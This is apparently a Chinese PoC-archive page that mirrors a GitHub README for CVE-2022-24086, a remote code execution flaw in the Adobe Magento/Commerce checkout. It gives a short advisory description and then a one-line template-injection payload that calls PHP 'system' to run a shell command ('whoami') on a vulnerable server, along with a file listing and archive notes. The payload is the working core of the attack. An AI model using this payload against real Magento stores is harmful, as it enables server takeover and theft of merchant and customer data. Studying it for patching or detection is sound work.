POC详情: 86170c0a8807c1d6c93dcff88769a88aa84c2b36

来源
https://github.com/Mr-xn/CVE-2022-24086
关联漏洞
标题: Adobe Magento 输入验证错误漏洞 (CVE-2022-24086)
描述:Adobe Magento是美国奥多比(Adobe)公司的一套开源的PHP电子商务系统。该系统提供权限管理、搜索引擎和支付网关等功能。 Adobe Magento 存在输入验证错误漏洞,该漏洞源于输入验证不当。攻击者可利用该漏洞向应用程序发送专门设计的请求,并在目标系统上执行任意代码。
描述
CVE-2022-24086 about Magento RCE
介绍
# CVE-2022-24086
CVE-2022-24086 about Magento RCE 

## Description
Adobe Commerce versions 2.4.3-p1 (and earlier) and 2.3.7-p2 (and earlier) are affected by an improper input validation vulnerability during the checkout process. Exploitation of this issue does not require user interaction and could result in arbitrary code execution.

## POC

> Notice: This Not The True POC ...

![image](https://user-images.githubusercontent.com/18260135/155713791-49aa3cfd-d1a0-4f54-8de9-5a22eb1bf93c.png)

> POC

```{{var this.getTemplateFilter().addAfterFilterCallback("system").filter("whoami")}}```
文件快照

 [4.0K]  /data/pocs/86170c0a8807c1d6c93dcff88769a88aa84c2b36
├── [ 11K]  LICENSE
└── [ 591]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。